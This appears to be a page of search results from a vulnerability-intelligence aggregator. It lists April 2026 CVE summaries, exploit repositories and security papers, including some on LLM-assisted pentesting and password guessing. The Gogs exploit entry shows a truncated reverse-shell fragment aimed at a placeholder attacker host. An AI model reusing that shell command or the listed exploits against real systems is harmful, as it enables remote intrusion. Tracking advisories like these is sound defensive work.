7186 matches found

vulnersOsv
added 2026/04/14 10:38 p.m., 1 view

@semic/testing (=2.2.11), @vendure/dashboard (>=3.2.2 <=3.4.4) potentially affected by CVE-2026-40887 via @vendure/core (>=3.0.0 <=3.4.4)

@vendure/core NPM version =3.0.0, =3.2.2, =3.4.4 Source cves: CVE-2026-40887 Source advisory: OSV:GHSA-9PP3-53P2-WW9V...

9.1 CVSS, 5.8 AI score, 0.07704 EPSS
Exploits 0

GithubExploit
added 2026/04/14 8:6 p.m., 68 views

CloudStorageHunter-Pro

🔥 CloudStorageHunter-Pro 🚀 Ultimate Cloud Storage Security...

5.9 AI score
Exploits 0

NVD
added 2026/04/14 6:17 p.m., 0 views

CVE-2026-5756

Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services COS allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing services...

7.5 CVSS, 0.00014 EPSS
Exploits 0, References 2

ATTACKERKB
added 2026/04/14 5:51 p.m., 0 views

CVE-2026-5756

Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services COS allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing services...

5.8 AI score, 0.00014 EPSS
Exploits 0, References 2, Affected Software 1

CVE
added 2026/04/14 5:51 p.m., 4 views

CVE-2026-5756

DRC COS (Central Office Services) is affected by an unauthenticated configuration file modification vulnerability via the /v0/configuration endpoint. The issue allows a network-adjacent attacker to submit JSON payloads that persistently modify the server’s configuration, potentially enabling data...

7.5 CVSS, 5.8 AI score, 0.00014 EPSS
Exploits 0, References 2

GithubExploit
added 2026/04/14 9:17 a.m., 72 views

ai-pentest-agent

🔐 AI Pentest Agent v4 Automated web application penetration...

5.9 AI score
Exploits 0

Positive Technologies
added 2026/04/14 12:0 a.m., 4 views

PT-2026-32983

Name of the Vulnerable Software and Affected Versions: Giskard versions prior to 1.0.2b1. Description: The RegexMatching check in the giskard-checks package passes a user-supplied regular expression pattern directly to the Python re.search function without a timeout, complexity guard, or pattern...

1 CVSS, 5.9 AI score, 0.00008 EPSS
Exploits 0, References 7

Packet Storm News
added 2026/04/14 12:0 a.m., 5 views

LLM-Guided Prompt Evolution for Password Guessing

Passwords still remain a dominant authentication method, yet their security is routinely subverted by predictable user choices and large-scale credential leaks. Automated password guessing is a key tool for stress-testing password policies and modeling attacker behavior. This paper applies...

5.8 AI score
Exploits 0

Positive Technologies
added 2026/04/14 12:0 a.m., 1 view

PT-2026-32896

Name of the Vulnerable Software and Affected Versions: DRC Central Office Services COS, affected versions not specified. Description: An unauthenticated configuration file modification issue allows an attacker to modify the server configuration file. This could lead to mass data exfiltration, malicio...

7.5 CVSS, 5.8 AI score, 0.00014 EPSS
Exploits 0, References 5

GithubExploit
added 2026/04/13 5:36 a.m., 80 views

Bluetooth-app

Bluetooth Security Testing App A Kivy-based Android applicati...

5.8 AI score
Exploits 0

Hive Pro Threat Advisories
added 2026/04/13 5:27 a.m., 3 views

Vulnerability Assessment vs Penetration Testing: What Security Leaders Need to Know

Your organization runs quarterly vulnerability scans. You get a report with hundreds, sometimes thousands, of findings. Your team patches what they can and moves on. Six months later, you bring in a penetration testing firm, and they walk right through your defenses using a chain of...

5.8 AI score
Exploits 0

GithubExploit
added 2026/04/13 3:27 a.m., 67 views

xss_hunter.py

EnterXSS Fuzzer – Automated Cross-Site Scripting Detection...

5.8 AI score
Exploits 0

CVE
added 2026/04/13 2:27 a.m., 5 views

CVE-2026-6179

CVE-2026-6179 concerns a stored cross-site scripting (XSS) vulnerability in NightWolf Penetration Testing Platform. The affected entry states that an attacker can trigger and run malicious script in a user’s browser due to a stored XSS flaw, enabling impact on user-side confidentiality and integr...

6.3 CVSS, 5.8 AI score, 0.0002 EPSS
Exploits 0, References 1

Packet Storm News
added 2026/04/13 12:0 a.m., 2 views

Towards Automated Pentesting with Large Language Models

Large Language Models (LLMs) are redefining offensive cybersecurity by allowing the generation of harmful machine code with minimal human intervention. While attackers take advantage of dark LLMs such as XXXGPT and WolfGPT to produce malicious code, ethical hackers can follow similar approaches to...

6 AI score
Exploits 0

CNNVD
added 2026/04/13 12:0 a.m., 1 view

NightWolf Penetration Testing Platform Security Vulnerability

NightWolf Penetration Testing Platform is an open-source cybersecurity testing tool developed by NightWolf. It is designed specifically for red teams and penetration testers, used for vulnerability exploitation, privilege escalation, and lateral movement testing. The NightWolf Penetration Testing...

6.3 CVSS, 5.7 AI score, 0.0002 EPSS
Exploits 0, References 1

GithubExploit
added 2026/04/12 4:30 p.m., 146 views

Exploit for CVE-2020-24586

Fracture FragAttacks WiFi Penetration Framework CVE-202...

3.5 CVSS, 7.1 AI score, 0.01457 EPSS
Exploits 4

GithubExploit
added 2026/04/12 4:23 p.m., 63 views

patchbot

patchbot patchbot is an AI-assisted security reviewer for p...

6.1 AI score
Exploits 0

GithubExploit
added 2026/04/12 3:12 p.m., 81 views

Exploit for Deserialization of Untrusted Data in Facebook React

R2SAE - React2Shell Auto-Exploit A Firefox extension...

10 CVSS, 7.7 AI score, 0.82011 EPSS
Exploits 358

GithubExploit
added 2026/04/12 9:39 a.m., 67 views

pentest-autopilot-mcps

Pentest Autopilot MCP Servers Professional-grade Model Contex...

6 AI score
Exploits 0

GithubExploit
added 2026/04/11 8:28 p.m., 119 views

Exploit for Path Traversal in Gogs

CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...

8.8 CVSS, 5.8 AI score, 0.17737 EPSS
Exploits 14